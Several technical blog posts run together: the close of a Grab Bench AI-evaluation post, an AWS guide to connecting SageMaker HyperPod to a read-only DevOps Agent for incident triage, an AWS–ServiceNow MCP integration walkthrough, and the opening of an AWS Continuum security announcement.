Before a comparison run is trusted, the package also has to pass gates: oracle or reference solutions behave as expected, weak baselines fail, redaction passes where applicable, score spread remains useful, and canaries catch harness regressions. Here, a canary is a deliberately simple or malformed case with a known expected result, such as a no-evidence profile update that must be rejected.
Figure 2. Teaching artifacts and certification artifacts share the same harness but need different access boundaries.
What we learned
The most useful Grab Bench output is often not the leaderboard. It is the failure taxonomy.
We saw that more reasoning is not a universal good. It can help planning-heavy tool use and hurt tasks that need literal schema discipline. Evidence selection is also part of reasoning: citing everything is not safer when only a few rows are direct support. For agentic coding, category-level results matter because a model can handle API contracts while missing stateful invariants.
We also learned not to treat prompt or model settings as universal. A setting that helps one task can make another worse. That pushed us toward task-level reports, not one global recommendation, and toward comparisons that show failure tags alongside scores.
Most of all, evals need hygiene: versions, baselines, gates, dashboards, and scope limits.
One limit is worth stating plainly: synthetic evals do not prove production uplift. They tell us whether a model respects the contract under controlled pressure. Live retrieval quality, user impact, and rollout decisions still need separate evidence.
What comes next
Next, we want the benchmark surfaces to look more like pipelines. Instead of scoring only the final answer, we want to separate retrieval, reasoning, action selection, latency, cost, and safety where the task supports it.
We also want packages to be easier for other teams to reuse. A good eval should not depend on one team remembering how it works; it should be documented, versioned, and safe enough for others to run.
Grab Bench is our attempt to make AI evaluation boring in the useful way: configuration in, rows out, failures explained, shortcuts caught. The question is not which model wins in the abstract. It is which model is ready for this work, under these constraints, with these failure modes.
The test I would apply to any eval is simple. If a cite-everything baseline can pass, the eval is not measuring evidence discipline. If a visible-test-only agent can pass, it is not measuring production behaviour. The useful conversation starts when the benchmark can show the shortcut and make it fail.
Join us
Grab is Southeast Asia’s leading superapp, serving over 900 cities across eight countries (Cambodia, Indonesia, Malaysia, Myanmar, the Philippines, Singapore, Thailand, and Vietnam). Through a single platform, millions of users access mobility, delivery, and digital financial services, including ride-hailing, food delivery, payments, lending, and digital banking via GXS Bank and GXBank. Founded in 2012, Grab’s mission is to drive Southeast Asia forward by creating economic empowerment for everyone while delivering sustainable financial performance and positive social impact.
Powered by technology and driven by heart, our mission is to drive Southeast Asia forward by creating economic empowerment for everyone. If this mission speaks to you, join our team today!
Large-scale machine learning workloads: training, fine-tuning, and inference run on clusters of hundreds to thousands of GPU instances for days or weeks at a stretch. Keeping operational visibility across a fleet of this size is a constant challenge: hardware health events, node lifecycle transitions, capacity fluctuations, and workload-level issues appear in the event stream around the clock, including nights and weekends.
Amazon SageMaker HyperPod is a purpose-built managed cluster service that lets you run distributed model training, fine-tuning, and inference across hundreds of accelerated instances. It provides built-in resiliency that automatically detects and replaces faulty hardware, so long-running jobs can continue with minimal interruption.
For teams operating these clusters, the scale still creates a fundamental tension: you need continuous visibility into your fleet, but you can’t afford to keep engineers watching the event stream 24/7.
What HyperPod resiliency already handles
SageMaker HyperPod’s built-in resiliency layer automatically detects and self-heals instance-level GPU failures. When the Health Monitoring Agent (HMA) identifies a bad GPU, the HyperPod resiliency layer drains, reboots, or replaces the node depending on the error type, and the job resumes without human intervention. This is exactly what you want: routine hardware failures are handled automatically so your training runs keep going.
This solution does not replace HMA or any part of HyperPod’s resiliency. It adds an autonomous investigation layer on top, using the cluster events and health signals that HMA and HyperPod already produce as its input.
Operational conditions where a human still wants to be in the loop
With that self-healing in place, there are operational conditions where a human still wants to be in the loop or decide:
Configuration issues: a lifecycle-script change you made, a misconfigured mount, or a networking/security change that causes provisioning failures on every new node.
Capacity conditions: a replacement waiting on capacity in the pool, where the operator needs to know recovery is in flight and can decide whether to intervene.
Recurring hardware faults: each fault self-heals correctly, but the same GPU error signature recurring across three or more replacements on one instance group in a week is a pattern worth surfacing to an operator as a single signal.
Workload-level conditions: Pods stuck in CrashLoopBackOff for hours, nodes sitting NotReady, or GPU allocation chronically low.
Without automation, these conditions push operators into round-the-clock manual triage: correlating events across the SageMaker control plane, Amazon EKS, and Amazon CloudWatch, and deciding whether HyperPod is still recovering or needs a hand.
Opportunity: AWS DevOps Agent as a 24/7 companion
AWS DevOps Agent provides an autonomous incident-response platform that can be taught a domain’s operational model through custom skills. By wiring your HyperPod cluster into DevOps Agent, you get a 24/7 companion that complements HyperPod’s self-healing. It watches for the operational conditions that still need a human decision, triaging them, root-causing them, and delivering a clear verdict with recommended actions.
By design, DevOps Agent is configured to run in observe-and-report mode for this integration – it is not granted SSM, SSH, or action-taking permissions against your cluster or its nodes. The agent reads cluster events, control-plane state, Kubernetes objects, and CloudWatch logs to reconstruct what happened; every corrective action (node reboots, replacements, drains) continues to be performed by HyperPod’s own resiliency layer or by an operator responding to the emailed verdict. This read-only boundary is deliberate: it keeps the agent’s blast radius zero while still delivering the correlation and triage value.
In this post, you will learn how to connect any SageMaker HyperPod cluster (either the EKS or Slurm Orchestrator option) to AWS DevOps Agent. Conditions are auto-detected, triaged, root-caused from cluster state and CloudWatch logs, and emailed as a clear verdict.You will also see how the solution can be extended to detect additional conditions specific to your workloads.
Solution Overview
What this solution delivers
This solution wires any SageMaker HyperPod cluster into AWS DevOps Agent so that operational conditions calling for a human decision are auto-detected, triaged, root-caused, and delivered as a human-readable verdict email. Specifically, you get:
Autodetection of HyperPod conditions that complement resiliency self-healing, from the live SageMaker event stream and a periodic Kubernetes-state audit.
Triage + root-cause analysis by the DevOps Agent, taught HyperPod’s operational model via two custom skills. It reconstructs the incident timeline and decides whether HyperPod is still recovering or needs an operator.
Human-readable verdict emails: Monitor (recovery in flight, here’s the ETA), Escalate (you need to act, here’s why and what to do), or Resolved (auto-recovery closed the loop). Noise is filtered out.
Extensibility: customize what conditions are detected (by modifying the periodic-audit Lambda) and how the agent reasons about them (by editing the plain-English skills).
The following screenshot shows the DevOps Agent incident response dashboard with example verdict emails for three common fault types:
DevOps Agent incident response dashboard showing investigation list and timeline, with three email verdict examples for GPU NVLink fault, lifecycle-script bootstrap failure, and insufficient-capacity errors
Architecture
The whole solution deploys one AWS CloudFormation stack per cluster. Two event paths feed the DevOps Agent, and one path carries its verdicts back out to you.
Architecture diagram showing the event flow from HyperPod Health Monitoring Agent through EventBridge to DevOps Agent and email notification
This architecture shows a 1:1 relationship between a HyperPod cluster and a DevOps Agent space, and the deployment instructions in this post follow that model. If you need to associate multiple clusters with a single Agent Space, you can customize the CloudFormation template and the ClusterFilter parameter to widen the allowlist of cluster names forwarded by the webhook bridge.
Event flow
Event-driven issue detection: HyperPod emits cluster-state, node-health, and capacity events to Amazon EventBridge. The webhook bridge Lambda drops routine Info-level noise, maps the rest into a DevOps Agent investigation payload, signs it with HMAC-SHA256 using a shared secret stored in AWS Secrets Manager, and POSTs it to the agent’s generic webhook.
Polling-based issue detection: A periodic-audit Lambda checks Kubernetes state (CrashLoopBackOff pods, NotReady nodes) every 15 minutes and fires only when it finds a real issue, plus a daily heartbeat confirming the pipeline is alive. On a healthy cluster, nothing is POSTed, so no investigation runs and no cost is incurred.
Investigation: DevOps Agent receives the payload and runs two custom skills: the triage skill decides whether to link (duplicate), skip (noise), or proceed (investigate). The RCA skill reconstructs the timeline using describe-cluster, list-cluster-nodes, list-cluster-events, kubectl, and CloudWatch logs (HMA health monitoring, lifecycle scripts), then classifies the incident as Suppress, Monitor, Escalate, or Resolved.
Notification: An Amazon Lambda function sends notification emails via Amazon SES. It listens on the aws.aidevops event stream for investigation completions, reads the verdict from the agent’s journal, and sends an email with the headline, what happened, likely cause, and recommended action. Suppress verdicts are filtered to avoid noise on healthy clusters.
Getting started
For a step-by-step walkthrough to deploy this solution, visit the DevOps Agent Integration guide. Once you have the solution running, the following sections explain how to customize detection, reasoning, and notifications for your environment.
Prerequisites
An AWS account with AWS CLI v2 configured for the target region.
An existing SageMaker HyperPod cluster (EKS or Slurm orchestrator).
IAM permissions to create roles, deploy CloudFormation, manage Secrets Manager, and call devops-agent:* and eks:CreateAccessEntry.
For email notifications: a verified Amazon SES sender identity. You can verify an email address in the Amazon SES console or with the AWS CLI. After running the command below, the address owner will receive a verification email and must click the confirmation link:
Recipients must also be verified if your SES account is still in sandbox mode.
Deploying with CloudFormation
The solution deploys as a single CloudFormation stack. Clone the awsome-distributed-ai repository, create a params.json with your cluster name and email settings, and run:
cd 1.architectures/5.sagemaker-hyperpod/tools/devops-agent
# 1. Set up a Python env with boto3 >= 1.43.25
python3 -m venv .venv && source .venv/bin/activate && pip install 'boto3>=1.43.25'
# 2. Fill in your cluster name and email addresses
cp deploy/params.example.json deploy/params.json
# edit: HyperPodClusterName, EmailSender, EmailRecipients
# 3. Deploy
make deploy
This provisions the Agent Space with read-only EKS access (auto-discovered from the cluster’s orchestrator ARN), the EventBridge rule and webhook bridge Lambda, the periodic-audit scheduler, and the email notifier. For Slurm-orchestrated clusters, the EKS access step is skipped automatically.
The webhook bridge — mapping HyperPod events to DevOps Agent
An EventBridge rule captures HyperPod events and invokes a Lambda function. The Lambda forwards all Warn and Error level events, normalizing each into a DevOps Agent investigation payload. It extracts the failure message, instance group, and event metadata, then signs it with HMAC using a shared secret stored in AWS Secrets Manager, and POSTs it to the agent’s generic webhook endpoint. Info-level events are dropped at the bridge to avoid creating investigations for routine status updates.
A cluster allowlist parameter lets you scope which HyperPod clusters trigger investigations, useful when multiple clusters share the same account and region.
How the skills are defined — teaching the agent HyperPod’s operational model
AWS DevOps Agent skills are plain-English instructions that teach the agent how to reason about a domain. This solution includes two complementary skills:
The triage skill runs first on every incoming task. It decides whether to link the event to an existing investigation, skip it, or proceed to a full investigation.
Why triage matters — a concrete example: When a single node fails, HyperPod’s replacement process emits multiple events in quick succession: “lost orchestration-ready status,” “provisioning started,” “capacity request initiated.” Without triage, each event would spawn a separate investigation. The triage skill recognizes these events belong to the same incident (same instance group + overlapping time window) and links them, so only one investigation runs. This saves investigation compute and avoids duplicate emails.
When to SKIP: When a node is already being replaced and a follow-up “lost orchestration-ready status” event arrives with a generic “Request to service failed” message, the triage skill recognizes that a replacement is already in progress for that instance group and skips the event. No new investigation is created for what is simply a progress update of an existing recovery.
When triage produces PROCEED, the RCA skill takes over. It reads cluster state, events, and logs, reconstructs an incident timeline, and classifies the situation into one of four verdicts:
RCA Flowchart showing the four phases of root-cause analysis: data gathering, timeline reconstruction, classification, and recurrence check
Phase 1 — Data gathering: The skill reads describe-cluster, list-cluster-nodes, list-cluster-events, and CloudWatch log streams (HMA health monitoring, lifecycle scripts) to collect the raw facts.
Phase 2 — Timeline reconstruction: It orders events chronologically and identifies the fault chain: what triggered what, which nodes were affected, and what recovery actions HyperPod took.
Phase 3 — Classification: Based on the timeline, recurrence statistics, and HyperPod’s resiliency behavior, it assigns a verdict:
Suppress — a non-issue (for example, a transient event that has already resolved).
Monitor — recovery is in flight; here’s the expected resolution window.
Escalate — you need to act; here’s the root cause and recommended action.
Resolved — auto-recovery closed the loop; no action needed.
Phase 4 — Recurrence check: The skill computes sliding-window statistics over the one week cluster event history. When thresholds are crossed, the verdict escalates to alert the operator of a systemic pattern. For example, the same GPU error signature on the same instance group three or more times in a week, or five or more replacements fleet-wide in 24 hours.
The verdict is written to the agent’s investigation journal along with a human-readable report containing what happened, the likely cause, and recommended operator actions.
The periodic-audit Lambda — Kubernetes state monitoring
The periodic-audit Lambda fires every 15 minutes and inspects Kubernetes Pod/Node state directly (via the EKS API server). It checks for:
Pods in CrashLoopBackOff (default: flagged when restart count reaches five and the last crash is within 15 minutes)
NotReady nodes (default: flagged when a node has been NotReady for at least 15 minutes and at least 10% of nodes are affected)
Namespace-aware filtering controls which pods are checked:
Pods in kube-public and kube-node-lease are ignored entirely by default.
Pods in kube-system, aws-hyperpod, and amazon-cloudwatch are tagged as system-workload issues (distinct from user-workload issues in the verdict).
All thresholds and namespace lists are configurable via the CloudFormation stack parameters.
The Lambda POSTs a webhook event to DevOps Agent only when a real issue is found. On a healthy cluster, nothing is POSTed, so no investigation runs and no cost is incurred. A separate daily heartbeat schedule confirms the monitoring pipeline itself is alive. The heartbeat is visible in the DevOps Agent console but deliberately not emailed on healthy runs — so silence in your inbox means the cluster is healthy, not that the pipeline is broken.
Note: HyperPod infrastructure faults (node health, capacity errors, lifecycle-script failures) are handled event-driven by the webhook bridge. They come from the native HyperPod event stream in EventBridge. The periodic audit deliberately does not duplicate that path; it only covers Kubernetes workload state, which is not in the HyperPod event stream.
Closing the loop — the email notifier
An EventBridge rule on the aws.aidevops event stream captures investigation lifecycle events. The email-notifier Lambda processes these events through the following steps:
Event filtering:Only “Investigation Completed” events are processed (one email per investigation lifecycle). The event payload contains the agent_space_id, task_id, and execution_id.
Dedup: The Lambda checks an S3 marker at s3://<bucket>/emailed/<execution_id>. If present, this investigation has already been emailed and the event is dropped. This prevents duplicate emails when the same completion event is re-emitted.
Fetching the investigation context: The Lambda calls two DevOps Agent APIs:
get_backlog_task(agentSpaceId, taskId) — retrieves the task metadata (title, priority, timestamps).
list_journal_records(agentSpaceId, executionId) — retrieves the investigation’s findings, symptoms, and investigation gaps from the agent’s journal.
Suppress-verdict filtering: If the investigation produced a Suppress verdict or no findings at all, no email is sent.
Email composition: The Lambda composes a single HTML email from the journal records: a short headline followed by a one-paragraph summary covering what happened, the likely cause, and the recommended action.
Send via SES: The formatted email is sent to the configured recipients. After successful delivery, the S3 dedup marker is written.
The operator also has access to the full investigation in the DevOps Agent web console (see following “Viewing investigations” section).
Viewing investigations in the DevOps Agent console
For readers new to AWS DevOps Agent, here’s how to navigate to your investigations:
Select your Agent Space (named hyperpod-<cluster-name>-devops-agent by default).
From the Launch web app drop-down, choose an option to open the DevOps Agent web app.
Select Incidents from the left navigation pane to open the Incident Response Dashboard. It lists all investigations with their subject, status, and timestamp.
Select any investigation to see its full timeline, journal records, and the verdict report.
Asking the agent directly — the DevOps Agent Chat UI
Beyond the automated emails, you don’t have to wait for the next investigation to get answers about your cluster. You can open the DevOps Agent’s AI chat at any time and ask follow-up questions in plain English. The agent answers from the live cluster state, the investigation history, and the skills it has been taught.
For example:
“I got an email about a GPU failure in my cluster. Did it get resolved now with HyperPod’s resiliency?” — The agent checks the current cluster state, confirms whether the replacement succeeded, and provides a timeline of what happened (HMA detection → replacement initiated → node back in service), along with anything to watch for.
“Are there unhealthy Pods on my cluster?” — The agent inspects the Kubernetes state and reports any CrashLoopBackOff pods or NotReady nodes.
“I just triggered scaling up. Check if it is progressing well.” — The agent looks at the cluster’s current node counts vs. target counts and reports whether provisioning is on track.
AWS DevOps Agent chat interface showing a natural language query about cluster health
The chat conversations are stored per Agent Space, so you can revisit past interactions alongside the automated investigations. This makes the Agent Space a single pane of glass for both automated incident response and ad-hoc troubleshooting of your HyperPod cluster.
Extending the solution — detection vs. reasoning
The solution has two extension points, which serve different purposes:
Extending detection (what conditions are caught):
Event-driven path: The webhook bridge Lambda drops Info-level events and forwards all Warn and Error level HyperPod events to DevOps Agent. This typically does not need modification. It already catches all actionable events.
Polling-based path: The periodic-audit Lambda checks Kubernetes state. To detect additional conditions (for example, GPU allocation below a threshold or specific Pod labels stuck in error states), add that logic to the Lambda code.
Extending reasoning (how the agent investigates and classifies): edit the plain-English skill definitions. For example, you can teach the RCA skill new classification rules, add domain-specific context about your workload’s expected behavior, or adjust the recurrence thresholds.
Detection is code; reasoning is natural language. Both are in the repo and designed to be customized independently.
Investigation feedback
After each investigation completes, a Feedback button appears in the DevOps Agent console. Clicking it opens the Investigation feedback dialog, where you can:
Rate whether the root cause was correct
Indicate whether human steering was needed during the investigation
Provide written feedback explaining what could be improved
This structured feedback is stored per investigation. An auto-learning mechanism that uses this feedback to improve future investigations is actively being developed.
DevOps Agent APIs used by this solution
For readers interested in the programmatic integration, here are the key DevOps Agent APIs this solution calls:
Component
API
Purpose
Webhook provisioner (deployment)
register_service
Register the generic webhook service with DevOps Agent
Webhook provisioner (deployment)
associate_service
Associate the webhook with the Agent Space
Skill uploader (deployment)
list_assets
Check if a skill already exists
Skill uploader (deployment)
create_asset / update_asset
Upload or update the triage and RCA skill definitions
To remove all resources created by this solution, run:
make teardown-stack
This deletes the CloudFormation stack, removes the Agent Space, EKS access entries, secrets, and email configuration.
Additionally, if you no longer need the prerequisite resources, you can revert their setup, for example, deleting the verified Amazon SES email address identities you created for notifications.
Cost considerations
This solution is designed to be near-zero cost on a healthy cluster and scales proportionally with fault volume. Cost scales with fault volume, not node count directly. At large scale (100+ nodes), the triage skill becomes critical. A single hardware fault can generate 5-10 correlated EventBridge events, most of which are filtered by the webhook bridge Lambda before reaching the agent. Where triage adds value is linking and deduplicating across similar faults that affect multiple instances, or repeated faults on the same instance over time, consolidating them into a single investigation instead of many. As an example, a 500-node training cluster might see 20-50 investigations per month after filtering and deduplication.
Filtering and triage are your cost savers at scale. The webhook bridge filters correlated events from a single node failure (5-10 EventBridge events reduced to 1 forwarded event), eliminating redundant investigations at the source. Triage then links similar faults across multiple instances into a single investigation. For example, if 5 nodes hit the same GPU error in a window, triage consolidates them into 1 investigation instead of 5 (saving 4 × $4 = $16). The bigger the cluster, the more both layers save.
Investigation duration grows sub-linearly. A 1000-node cluster investigation doesn’t take 100x longer than a 10-node one. The agent queries describe-cluster and list-cluster-events once regardless of size. The data returned is bigger, but the API call count is similar.
CloudWatch Logs queries are the variable. On large clusters, the agent may query more HMA log streams, which takes longer agent-seconds AND incurs CloudWatch Logs Insights charges on your account (not part of DevOps Agent pricing).
DevOps Agent (the primary cost driver): Estimates based on 2 accelerator instances in a cluster
Component
Pricing
Your cluster estimate
Investigations
$0.0083/agent-second
~$4/investigation (at 8 min avg)
Chat (on-demand SRE tasks)
$0.0083/agent-second
~$0.25/chat query (at 30 sec avg)
Daily heartbeat
$0.0083/agent-second
~$1-2/day (short investigation confirming health)
On a healthy cluster with no faults, only the daily heartbeat fires, approximately $30-60/month in DevOps Agent time. On a cluster experiencing 5 real faults per week (typical for a large GPU fleet), expect ~20 investigations/month × $4 each = $80/month in investigation costs.
Free tier and credits:
New DevOps Agent customers receive a 2-month free trial (20 hours of investigations, 20 hours of chat per month). Enterprise Support customers receive monthly credits equal to 75% of their AWS Support charge toward DevOps Agent usage.
Supporting infrastructure (secondary costs):
Component
Monthly Cost Estimates
Lambda invocations
~96/day (15-min audit) + event-driven = well within free tier
S3 (skills + dedup markers)
< $0.01 (a few MB total)
Secrets Manager (1 secret)
$0.40
EventBridge rules
Negligible (per-event pricing)
SES emails
$0.10/1000 emails — at most 1 per investigation
CloudWatch Logs (Lambda)
< $1 (minimal log volume)
Total estimated monthly cost:
Scenario
DevOps Agent
Infrastructure
Total
Healthy cluster (no faults)
~$30-60 (heartbeat only)
< $2
~$32-62/month
Moderate faults (5/week)
~$80-120
< $2
~$82-122/month
Heavy faults (20/week)
~$320-400
< $5
~$325-405/month
How cluster size impacts cost
Factor
Small cluster (1-10 nodes)
Large cluster (100-1000 nodes)
Fault frequency
Rare (maybe 1-2/week)
Constant (NVIDIA reports ~1 fault/2-3 hours at 10K GPU scale)
Events per fault
Few (1 node replacement = 3-5 events)
More (cascading replacements, capacity queuing)
Investigation duration
Shorter (less state to read, fewer events in timeline)
Longer (more nodes to describe, more events to correlate, larger CloudWatch log groups to query)
Triage value
Low (few duplicates)
High (one fault generates many correlated events — triage links them into 1 investigation)
Periodic audit
Fast (few pods/nodes to check)
Slower (more K8s state to inspect)
Cluster Size
Faults/month
Investigations
Est. Agent Cost
1-10 nodes (your test)
2-5
2-5 + heartbeat
$8-20/mo + ~$30 heartbeat
10-50 nodes (typical prod)
5-20
5-15 (triage dedup)
$20-60/mo + ~$30 heartbeat
100-500 nodes (large training)
50-200
20-50 (heavy triage)
$80-200/mo + ~$45 heartbeat
1000+ nodes (frontier)
200-700
50-100 (massive dedup)
$200-500/mo + ~$60 heartbeat
Cost control levers:
Disable the periodic audit (EnablePeriodicAudit: false) to eliminate the heartbeat cost. Live event bridging still works.
Triage (LINK/SKIP decisions) runs at task creation time. No investigation cost is billed for deduplicated or skipped events.
Suppress verdicts filter email notifications but the investigation still runs. If you want to eliminate that cost, tune your EventBridge rule to drop more event types at the bridge level.
Comparison to manual monitoring:
Without automation, each fault requires an on-call engineer to manually correlate events across CloudWatch, EKS, and the SageMaker console, typically 30-45 minutes of triage before they even know whether HyperPod is self-healing or needs intervention. This solution delivers a root-caused verdict in minutes at ~$4 per investigation, while providing 24/7 coverage without human wake-ups. The cost savings compound with cluster scale: at 20 faults per month, that’s 10-15 hours of engineering triage replaced by automated verdicts.
Conclusion
In this post, we showed how to build an end-to-end agentic incident-response pipeline for SageMaker HyperPod using AWS DevOps Agent. The solution complements HyperPod’s built-in resiliency by watching for the operational conditions where a human still wants to be in the loop: configuration issues affecting provisioning, capacity-bound recoveries, recurring hardware fault patterns, and workload-level conditions. It delivers clear, root-caused verdicts to the operator’s inbox.
The broader takeaway is a reusable pattern: teaching an AI agent a domain’s operational model through plain-English skills, so it can distinguish “the system is recovering on its own” from “this needs a human decision.” This pattern applies beyond HyperPod to any event-driven AWS service where operational conditions benefit from automated correlation and triage.
Adjust the CloudFormation parameters: tune the periodic-audit schedule, CrashLoopBackOff thresholds, NotReady node percentages, namespace filtering, and email recipients. No code changes required.
Extend detection: modify the periodic-audit Lambda to check for additional Kubernetes conditions specific to your workloads (for example, GPU allocation below a threshold, specific Pod labels stuck in error states).
Extend reasoning: edit the triage or RCA skill definitions to adjust classification rules, add domain context about your expected cluster behavior, or tune the recurrence thresholds.
Add notification channels: connect Slack or PagerDuty via DevOps Agent’s built-in integrations or via a sibling EventBridge rule on the same aws.aidevops event stream.
The skills are plain English. Iterate on them the same way you’d iterate on a runbook.
This post is co-written with Govind Menon, Head of MCP Product at ServiceNow.
Introduction
Enterprise teams managing applications on AWS often rely on ServiceNow as their IT service management (ITSM) system for incident tracking, change management, and configuration management. When incidents occur, engineers must context-switch between AWS, third party observability tools and ServiceNow, manually correlating data across those sources before updating ServiceNow incident records. This fragmented workflow delays resolution, increases mean time to resolution (MTTR), and introduces the risk of missed signals.
AWS DevOps Agent is a frontier agent that resolves and proactively helps prevent incidents, continuously improving reliability and performance of applications in AWS, and hybrid environments. In this post, we demonstrate how to integrate AWS DevOps Agent with ServiceNow using the Model Context Protocol (MCP) and ServiceNow Action Fabric, enabling autonomous incident investigation and resolution workflows that are governed by ServiceNow and that execute and record authorized actions directly on the application.
By the end of this post, you will be able to:
Configure AWS DevOps Agent as an MCP client connecting to ServiceNow MCP Server created in the MCP Server Console
Authenticate securely via OAuth 2.0 between AWS DevOps Agent and ServiceNow
Enable dynamic discovery of ServiceNow tools exposed through Action Fabric and governed through the ServiceNow MCP Server Console
Automate root cause analysis directly within ServiceNow incidents
Integrating ServiceNow MCP Server with AWS DevOps Agent
The integration between ServiceNow MCP Server and AWS DevOps Agent connects ITSM workflows with automated incident response through the Model Context Protocol (MCP), an open standard for AI agent-to-tool communication.
ServiceNow MCP Server Console lets you create a ServiceNow MCP Server and configure the tools it exposes, capabilities such as incident management, CMDB queries, and change requests as discoverable tools. The console governs what the agent can see and do through tool-level scoping, access control lists, and role masking. It is the access channel for ServiceNow Action Fabric, the application’s governed action layer: ServiceNow does not merely store the agent’s output, it controls and executes the actions the agent is authorized to perform.
AWS DevOps Agent acts as an MCP client that dynamically discovers available ServiceNow tools at runtime. You can create tools based on existing capabilities, such as ServiceNow NowAssist Skills.
When a ServiceNow incident triggers AWS DevOps Agent, the following happens:
Correlates telemetry from Amazon CloudWatch, deployment data, and code changes
Discovers available ServiceNow tools through the ServiceNow MCP Server
Queries ServiceNow for related incidents, change records, and CMDB context
Identifies root cause by correlating AWS telemetry with ServiceNow operational data
Writes findings, root cause analysis, and mitigation plans directly into the ServiceNow incident
Executes governed actions on the application (for example, creating a change request) through the tools the ServiceNow MCP Server Console exposes, where authorized
Security is built into every interaction. Communication uses OAuth 2.0 authentication with scoped
Permissions. The ServiceNow MCP Server Console governs which tools the agent can access and what actions it can perform, with every invocation authenticated, authorized at the tool and skill level, and recorded in an auditable trail that ServiceNow AI Control Tower can observe.
Figure 1: Integration architecture showing AWS DevOps Agent connecting to ServiceNow via MCP Server
Prerequisites
Before you begin, make sure you have access to and understanding of the following:
An AWS account with permissions to create AWS Identity and Access Management (IAM) roles:
Created AWS DevOps Agent Space role and Web app role
Step 1: Configure the ServiceNow MCP Server and its Tools in the MCP Server Console
As first step, configure the ServiceNow instance to expose capabilities through the MCP Server:
Navigate to the MCP Server Console in the ServiceNow Instance
Create a new MCP Server (or select the MCP server provisioned).
Figure 2: MCP Server Console in ServiceNow Instance
Add Tools for the capabilities the agent needs (for example, incident read and update, CMDB query, change request creation), and scope each with ACLs and role masking so the agent can perform only authorized actions.
Figure 3: Tool selection in ServiceNow MCP Server
Configure inbound authentication for the MCP Server.
Figure 4: Create Inbound Integration – OAuth Client Credentials grant
Step 2: Create and configure a DevOps Agent Space
Create an AWS DevOps Agent Space in your AWS account to define the scope of resources the agent will monitor and investigate:
Access the AWS DevOps Agent console
Choose Create Agent Space and provide a name and description, and configure the required IAM roles (automated or manual setup)
Figure 5: Creating an Agent Space in the AWS DevOps Agent console
Figure 6: Agent Space Name and IAM role configuration
Confirm creation of AWS DevOps Agent Space.
Step 3: Register ServiceNow MCP Server in the AWS DevOps Agent console
Register your ServiceNow MCP Server connection to enable tool discovery in the AWS DevOps Agent console.
Navigate to Capability Providers in the AWS DevOps Agent console. Under MCP Server, select Add source, then Register New MCP Server.
Enter your ServiceNow MCP Server endpoint URL:https://<instance>.service-now.com/sncapps/mcp-server/mcp/<server_label>
Figure 7: Entering the ServiceNow MCP Server endpoint URL
Select OAuth Client Credentials as the authorization flow. Enter the Client ID, Client Secret, and Exchange URL (https://<instance>.service-now.com/oauth_token.do) from Step 1.
Figure 8: OAuth Client Credentials configuration for the ServiceNow MCP Server
Submit the registration. AWS DevOps Agent validates the connection and discovers available tools. Select the tools to add to your Agent Space.
Figure 9: Selecting ServiceNow MCP tools to add to the Agent Space
Confirm the MCP Server is associated and tools are connected.
Putting It All Together: End-to-End Test
Once the setup is complete, we need to make sure the connection is working.
Navigate to Operator Access in the AWS DevOps Agent Space.
Open a new chat window, and type “Can you show me all the incident in the past week from ServiceNow”
Make sure the Agent calls the ServiceNow tools and shows the right results.
Figure 10: Test the ServiceNow MCP connection from AWS DevOps Agent
You can also configure your environment so that the creation of an incident in ServiceNow automatically triggers the AWS DevOps Agent. To set up this integration, follow the AWS documentation to establish the connection between AWS DevOps Agent and your ServiceNow instance. Then, create a Business Rule in ServiceNow. This enables incident creation to seamlessly trigger the DevOps Agent without manual intervention.
Once this setup is complete, here’s how the workflow comes together: when an incident is created, the DevOps Agent automatically investigates and adds relevant context such as root cause analysis, related changes, and affected resources directly back into the incident record. This means that by the time your Operations or SRE team picks up the incident, they already have the context they need to begin resolution, significantly reducing triage time and accelerating mean time to recovery (MTTR).
Figure 11: AWS DevOps Agent initiating an automated investigation on the ServiceNow incident
Figure 12: AWS DevOps Agent mitigation plan posted to the ServiceNow incident
Clean up
To avoid incurring ongoing costs, clean up your resources when you are done using the integration. For details on pricing, visit the AWS DevOps Agent pricing page.
When you are done using the integration, clean up your resources:
Delete your Agent Space from the AWS DevOps Agent console
Remove the ServiceNow MCP Server connection from your settings
Delete the IAM roles created for the Agent Space
(Optional) Disable the MCP Server configuration in your ServiceNow instance
Conclusion
For organizations running workloads on AWS and managing operations through ServiceNow, incident response has long meant toggling between systems and racing to document findings before context fades. The integration between AWS DevOps Agent and ServiceNow through MCP and Action Fabric alleviates that gap. The agent investigates autonomously, correlates telemetry with operational context, and documents root cause and mitigation directly in the incident record, compressing resolution times from hours to minutes.
And because the connection is built on MCP, an open protocol for agent-to-tool communication, what you configure today continues to expand as your ServiceNow workflows evolve. New tools exposed through Action Fabric are discovered and available to the agent immediately. To get started, visit the AWS DevOps Agent product page and ServiceNow MCP Server Console page.
Customers have access to models that are continuously getting better with each new generation bringing larger context windows, stronger reasoning, and lower token costs. Getting the strongest AI-powered security will come from tools that combine the most relevant models with deep knowledge of a customer’s specific environment.
AWS Continuum for code vulnerabilities (Preview) is built to be that tool to help secure your code at machine speed. Today, we’re announcing a partnership with Anthropic and OpenAI that extends AWS Continuum directly into the developer workflows where code is being written: Anthropic Claude Code, OpenAI Codex, and Kiro. Developers can use these integrations to discover vulnerabilities, contextually prioritize, validate, and remediate, within their existing workflows.
Models are getting smarter
AI models are advancing rapidly. Each generation brings new capabilities, and different models excel at different tasks. The latest frontier models can now identify vulnerabilities and reason through multi-step attack paths that would take a human security team weeks to trace manually.
This is a genuine breakthrough in detection, but it creates a new challenge for your security teams: more findings, more complexity, and the need to determine which ones matter most in your environment and how to address them. The next challenge customers face is building the correct harness and orchestration to turn these models into a single interface that goes from detection through remediation. This is what we set out to do when creating Continuum, which brings together many different models and uses the model that’s most effective for each part of the process.
We also partner with the Frontier Model Forum, an industry consortium developing shared safety standards, evaluation methods, and benchmarking to ensure we can evaluate these models effectively together. We’re also working with model providers on shared security performance benchmarking to make sure we’re using the best model for each task within Continuum and our other AWS security products.
The harness
An AI harness is the orchestration layer that wraps around a model to connect it to tools, guardrails, memory, and workflows, so it delivers outcomes. Think of the model as the engine and the harness as everything around it. You need both to have a high-performance car.
Harnesses are becoming increasingly complex. Teams are stitching together multiple models, agents that call agents, and dynamic workflows, and are dealing with constant change driven by innovations in models, agent frameworks, and tool integrations.
As a result of that complexity, customers are implementing shadow infrastructure to manage integration layers across models and tools. Every time the landscape shifts, security and governance controls potentially break, forcing teams to go back to revisit them and make updates.
These challenges extend beyond the model. They arise in the orchestration required to connect different models and developer environments with tools, context, controls, and workflows across a customer’s environment. At AWS, we see managing that complexity as heavy lifting that AWS should solve. We treat the harness as infrastructure and with the same rigor we apply to identity, discovery, policy enforcement, observability, and compliance of the core infrastructure at AWS.
Enter Continuum
